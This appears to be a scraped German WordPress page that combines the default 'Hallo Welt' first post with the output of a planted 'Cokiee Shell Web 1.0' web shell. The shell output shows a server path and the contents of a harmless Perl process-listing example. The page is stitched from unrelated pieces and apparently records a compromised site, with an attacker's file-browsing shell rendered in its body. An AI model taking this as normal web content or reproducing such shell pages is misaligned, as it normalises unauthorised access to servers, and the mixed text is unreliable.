Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/share/doc/libproc-processtable-perl/examples/ |
Current File : //usr/share/doc/libproc-processtable-perl/examples/example.pl |
#!/usr/bin/perl use Proc::ProcessTable; $ref = new Proc::ProcessTable; foreach $proc (@{$ref->table}) { if(@ARGV) { next unless grep {$_ == $proc->{pid}} @ARGV; } print "--------------------------------\n"; foreach $field ($ref->fields){ print $field, ": ", $proc->{$field}, "\n"; } }
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare